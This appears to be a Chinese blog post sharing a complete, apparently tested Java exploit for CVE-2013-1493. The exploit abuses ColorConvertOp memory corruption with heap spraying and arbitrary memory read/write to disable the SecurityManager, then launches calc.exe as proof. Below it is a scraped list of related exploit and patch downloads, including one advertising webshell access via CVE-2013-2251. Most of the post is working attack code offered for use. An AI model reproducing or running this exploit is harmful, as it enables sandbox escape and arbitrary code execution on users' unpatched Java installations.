0x01 这个又是一个java CVE,效果前几个一样,可以用来关闭SecurityManager,poc我找了好久好久,整合了下,经过测试在xp+jdk6下成功,win7+jdk7失败,原因不详。
这个poc的技术感觉是采用了漏洞溢出的原理,然后对一大片地址进行了喷射,然后强制置位,从而关掉了 SecurityManager,大家有什么见解可以聊聊。
0x02 这个poc好长好长。。。。
package test;
import java.awt.color.ColorSpace;
import java.awt.image.BufferedImage;
import java.awt.image.ColorConvertOp;
import java.awt.image.ColorModel;
import java.awt.image.ComponentColorModel;
import java.awt.image.ComponentSampleModel;
import java.awt.image.SampleModel;
import java.io.IOException;
public class TestCVE {
private static final long serialVersionUID = 1L;
static final int ARRAY_MAGIC = -1341411317;
static final int ARRAY_OLDSIZE = 11;
static final int ARRAY_NEWSIZE = 2147483647;
static final int LEAK_MAGIC = -559035650;
static final int SPRAY_ARRAY_COUNT = 2808685;
static final int SPRAY_LEAK_COUNT = 2000000;
volatile Leak[] _sleaks;
volatile int[][] _sarrays;
volatile int[] _bigArray;
int[] _memBaseObj;
long _memBaseIdx;
long _memBasePtr;
int[] soffsets;
int[] doffsets;
public void InitStep1() {
this.soffsets = new int[] { 0, 1, 2, 3 };
this.doffsets = new int[] { 0, 1, 2, 50000000 };
}
void spray() throws Exception {
Runtime.getRuntime().gc();
Runtime.getRuntime().gc();
this._sleaks = new Leak[2000000];
this._sarrays = new int[2808685][];
try {
for (int i = 0; i < this._sarrays.length; i++) {
this._sarrays[i] = new int[11];
for (int j = 0; j < this._sarrays[i].length; j++) {
this._sarrays[i][j] = -1341411317;
}
}
for (int i = 0; i < this._sleaks.length; i++)
this._sleaks[i] = new Leak("L");
} catch (OutOfMemoryError localOutOfMemoryError) {
}
}
void getBigArray() throws Exception {
for (int i = 0; i < this._sarrays.length; i++) {
for (int j = 0; (j < this._sarrays[i].length) && (j < 11); j++) {
this._sarrays[i][j] = -1341411317;
}
}
for (int i = 0; i < this._sarrays.length; i++) {
if (this._sarrays[i].length != 2147483647) {
for (int j = 0; (j < this._sarrays[i].length) && (j < 22); j++) {
if ((j > 0) && (this._sarrays[i][(j - 1)] != -1341411317)
&& (this._sarrays[i][j] == -1341411317)) {
this._sarrays[i][(j - 1)] = 2147483647;
}
}
}
}
for (int i = 0; i < this._sarrays.length; i++) {
if ((this._sarrays[i].length == 11) || (this._bigArray != null)
|| (this._sarrays[i].length != 2147483647))
continue;
this._bigArray = this._sarrays[i];
}
if (this._bigArray == null)
throw new Exception("fail");
}
//code by icefish!!!!
long getAddress(Object obj) throws Exception {
for (int i = 0; i < this._bigArray.length; i++) {
if (this._bigArray[i] == -559035650) {
int flag = 0;
for (int j = 0; j < this._sleaks.length; j++)
this._sleaks[j].obj = null;
flag += (this._bigArray[(i + 1)] == 0 ? 1 : 0);
for (int j = 0; j < this._sleaks.length; j++)
this._sleaks[j].obj = "X";
flag += (this._bigArray[(i + 1)] != 0 ? 1 : 0);
if (flag == 2) {
for (int j = 0; j < this._sleaks.length; j++)
this._sleaks[j].obj = obj;
return this._bigArray[(i + 1)];
}
}
}
throw new Exception("fail");
}
void getMemBase() throws Exception {
for (int i = 0; i < this._sarrays.length; i++) {
for (int j = 0; (j < this._sarrays[i].length) && (j < 11); j++) {
this._sarrays[i][j] = (j == 1 ? i : -1341411317);
}
}
for (int i = 0; i < this._bigArray.length; i++) {
if ((i > 0) && (this._bigArray[(i - 1)] != -1341411317)
&& (this._bigArray[i] == -1341411317)
&& (this._bigArray[(i + 1)] != -1341411317)) {
int len = this._bigArray[(i - 1)];
int idx = this._bigArray[(i + 1)];
if ((idx >= 0) && (idx < this._sarrays.length)
&& (this._sarrays[idx] != null)
&& (this._sarrays[idx].length == len)) {
this._memBaseObj = this._sarrays[idx];
this._memBaseIdx = i;
break;
}
}
}
if (this._memBaseObj == null) {
throw new Exception("fail");
}
this._memBasePtr = getAddress(this._memBaseObj);
if (this._memBasePtr == 0L) {
throw new Exception("fail");
}
this._memBasePtr += 12L;
}
int rdMem(long addr) {
long offs = this._memBaseIdx + (addr - this._memBasePtr) / 4L;
if ((offs >= 0L) && (offs < 2147483647L)) {
return this._bigArray[(int) offs];
}
return 0;
}
void wrMem(long addr, int value) {
long offs = this._memBaseIdx + (addr - this._memBasePtr) / 4L;
if ((offs >= 0L) && (offs < 2147483647L))
this._bigArray[(int) offs] = value;
}
public void InitStep2() {
try {
int sWidth = 168;
int sHeight = 1;
int spStride = 4;
int ssStride = spStride * sWidth;
int dWidth = sWidth;
int dHeight = sHeight;
int dpStride = 1;
int dsStride = 0;
ColorSpace scs = new MyColorSpace(0, this.soffsets.length - 1);
ColorModel scm = new ComponentColorModel(scs, true, false, 1, 0);
SampleModel ssm = new ComponentSampleModel(0, sWidth, sHeight,
spStride, ssStride, this.soffsets);
BufferedImage sbi = new MyBufferedImage(sWidth, sHeight, 6, 0, scm,
ssm);
for (int i = 0; i < ssStride; i++) {
sbi.getRaster().getDataBuffer().setElem(i, 1);
}
ColorSpace dcs = new MyColorSpace(0, this.doffsets.length - 1);
ColorModel dcm = new ComponentColorModel(dcs, true, false, 1, 0);
SampleModel dsm = new ComponentSampleModel(0, dWidth, dHeight,
dpStride, dsStride, this.doffsets);
BufferedImage dbi = new MyBufferedImage(sWidth, sHeight, 10, 0,
dcm, dsm);
ColorConvertOp cco = new ColorConvertOp(null);
spray();
try {
cco.filter(sbi, dbi);
} catch (Exception localException) {
}
getBigArray();
getMemBase();
long sys = getAddress(System.class);
long sm = getAddress(System.getSecurityManager());
sys = rdMem(sys + 4L);
for (int i = 0; i < 2000000; i++) {
long addr = sys + i * 4;
int val = rdMem(addr);
if (val == sm) {
wrMem(addr, 0);
if (System.getSecurityManager() == null) {
break;
}
}
}
} catch (Exception localException1) {
}
}
void alert() throws SecurityException {
try {
Runtime.getRuntime().exec("calc.exe");
} catch (SecurityException e) {
// TODO Auto-generated catch block
// e.printStackTrace();
throw e;
} catch (IOException e) {
// TODO Auto-generated catch block
e.printStackTrace();
}
}
public static void main(String args[]) {
System.out.println("1.SecurityManager 开启前测试");
TestCVE test = new TestCVE();
// test.checkPermission();
try {
test.alert();
System.out.println("2.成功执行 exec");
} catch (SecurityException e) {
System.out.println("2.you have no permission to exec");
}
System.out.println("3.开启SecurityManager");
System.setSecurityManager(new SecurityManager());
System.out.println("4.SecurityManager 开启后测试");
try {
test.alert();
System.out.println("5.成功执行 exec");
} catch (SecurityException e) {
System.out.println("5.you have no permission to exec");
}
test.disableSecurity();
System.out.println("6.CVE-2013-1493执行后");
try {
test.alert();
System.out.println("7.成功执行 exec");
} catch (SecurityException e) {
System.out.println("7.you have no permission to exec");
}
}
public void disableSecurity(){
InitStep1();
InitStep2();
}
}
class MyColorSpace extends ColorSpace{
private static final long serialVersionUID = 1L;
public MyColorSpace(int type, int numcomponents)
{
super(type,numcomponents);
}
public float[] fromCIEXYZ(float[] value) { return null; }
public float[] toCIEXYZ(float[] value) { return null; }
public float[] fromRGB(float[] value) { return null; }
public float[] toRGB(float[] value) { return null; }
}
class MyBufferedImage extends BufferedImage{
int _fakeType;
ColorModel _fakeColorModel;
SampleModel _fakeSampleModel;
public MyBufferedImage(int width, int height, int imageType, int fakeType, ColorModel fakeColorModel, SampleModel fakeSampleModel)
{
super(width,height, imageType);
this._fakeType = fakeType;
this._fakeColorModel = fakeColorModel;
this._fakeSampleModel = fakeSampleModel;
}
public int getType()
{
String caller = java.lang.Thread.currentThread().getStackTrace()[2].toString();
if (caller.contains("ICC_Transform.getImageLayout(")) {
return this._fakeType;
}
return super.getType();
}
public ColorModel getColorModel()
{
String caller = java.lang.Thread.currentThread().getStackTrace()[2].toString();
if ((caller.contains("ICC_Transform.getImageLayout(")) || (caller.contains("CMMImageLayout.<init>("))) {
return this._fakeColorModel;
}
return super.getColorModel();
}
public SampleModel getSampleModel()
{
String caller = java.lang.Thread.currentThread().getStackTrace()[2].toString();
if (caller.contains("ICC_Transform.getImageLayout(")) {
return this._fakeSampleModel;
}
return super.getSampleModel();
}
}
class Leak {
public volatile int magic;
public volatile Object obj;
public volatile Object obj2;
public volatile Object obj3;
public volatile Object obj4;
public Leak(Object o)
{
this.magic = -559035650;
this.obj = o;
}
}
相关推荐
CVE-2011-0816, CVE-2011-0831, CVE-2011-0832, CVE-2011-0835, CVE-2011-0838, CVE-2011-0848, CVE-2011-0870, CVE-2011-0876, CVE-2011-0879, CVE-2011-0880, CVE-2011-2230, CVE-2011-2231, CVE-2011...
利用CVE-2013-2251漏洞获取服务器的webshell,从而黑入服务器
14. CVE-2014-3566、CVE-2015-0449、CVE-2014-6569、CVE-2013-2186、CVE-2017-3248、CVE-2011-1411、CVE-2011-5035:这些早期的CVE编号显示了WebLogic历史上存在的安全问题,需要定期评估系统的安全状态,并进行必要...
CVE-2013-6117 $ ./CVE-2013-6117 -hOptions: -h, --help display help information -f, --filename File containing list of IP addresses -t, --target Target IP -n, --threads No of concurrent threads ...
针对CVE-2023-6548 和 CVE-2023-6549 的 NetScaler ADC 和 NetScaler Gateway 的漏洞补丁升级包 CVE-2023-6548 :在管理接口上执行经过身份验证的(低特权)远程代码 CVE-2023-6549:拒绝服务 2、 强烈建议受影响...
本篇将详细讨论如何修补OpenSSH中的几个已知漏洞,包括CVE-2020-15778、CVE-2018-15473、CVE-2018-15919。 首先,让我们了解这些特定的漏洞: 1. CVE-2020-15778:这是一个与OpenSSH密钥协商过程相关的漏洞,可能...
Androidroot源码利用CVE-2013-6282漏洞.zip,太多无法一一验证是否可用,程序如果跑不起来需要自调,部分代码功能进行参考学习。
自己总结出来的一个脚本,虽然是利用,但是工具是可以用。系统漏洞脚本
CVE-2013-6282是一个漏洞编号,该漏洞属于Linux内核级别的漏洞,在android 2.x至4.3之前的版本中同样存在, 可以用于系统提权,获得root权限,属于Linux系统API缺陷。 利用该漏洞,开发Android root程序。
weblogic10.36 CVE-2018-2893补丁文件 最新补丁文件,修复 WebLogic(CVE-2018-2893)安全漏洞预警,oracle官方发布了2018年4月份的关键补丁更新CPU(CriticalPatchUpdate),其中包含一个高危的Weblogic反序列化漏洞...
Jackson官方github仓库发布安全issue,涉及漏洞CVE-2019-14361和CVE-2019-14439,均是针对CVE-2019-12384漏洞的绕过利用方式,当用户提交一个精心构造的恶意JSON数据到WEB服务器端时,可导致远程任意代码执行。...
CVE-2022-33891POC Apache Spark 命令注入(CVE-2022-33891)POC CVE-2022-33891 影响版本 Apache spark version 3.1.1版本 Apache Spark version>= 3.3.0 修复方案 1.建议升级到安全版本,参考官网链接: ...
麒麟Linux kernel本地权限提升漏洞(CVE-2022-0847)漏洞补丁及相关依赖包9 麒麟Linux kernel本地权限提升漏洞(CVE-2022-0847)漏洞补丁及相关依赖包9 麒麟Linux kernel本地权限提升漏洞(CVE-2022-0847)漏洞补丁及相关...
标题"CVE-2018-3191利用exp"涉及的是一个针对WebLogic服务器的安全漏洞,该漏洞被命名为CVE-2018-3191。这个漏洞是由于WebLogic服务器中Spring框架的一个组件处理JNDI(Java Naming and Directory Interface)注入...
Linux kernel本地权限提升漏洞(CVE-2022-0847)漏洞补丁及相关依赖包1Linux kernel本地权限提升漏洞(CVE-2022-0847)漏洞补丁及相关依赖包1Linux kernel本地权限提升漏洞(CVE-2022-0847)漏洞补丁及相关依赖包1Linux ...
1.上传并解压:Centos7-openssh补丁包(最新fix CVE-2021-41617 #2008884).zip 2.到服务器对应的解压目录 执行命令安装 : rpm -Fvh openssh-* 3.安装完成后执行命令查看修复情况: rpm -qa openssh --changelog | ...
标题 "cve-2019-2725修复相关的补丁p29694149_10360190115_Generic.zip" 指涉的是一个针对CVE-2019-2725漏洞的安全更新。CVE-2019-2725,全称“Common Vulnerabilities and Exposures”,是2019年发现的一个特定安全...
OpenSSH 资源管理错误漏洞(CVE-2021-28041) OpenSSH 是一个开源的 SSH 服务器实现,广泛应用于 Linux、Unix 和 Windows 等操作系统中。然而,OpenSSH 也存在一些安全漏洞,其中之一就是资源管理错误漏洞(CVE-2021-...
Oracle 11.2.0.1 CVE-2012-1675 补丁:p12880299_112010_Linux-x86-64.zip 是一个针对Oracle数据库系统的重要安全更新。这个补丁主要解决了一个在Oracle 11.2.0.1版本中的严重安全漏洞,该漏洞被标记为CVE-2012-1675...
标题 "cve-2019-0708-poc-exp.zip" 指涉的是一个与CVE-2019-0708漏洞相关的Proof-of-Concept(PoC)利用工具的压缩包。这个漏洞,通常被称为“BlueKeep”,是一个严重且广泛影响微软远程桌面服务的安全漏洞。描述中...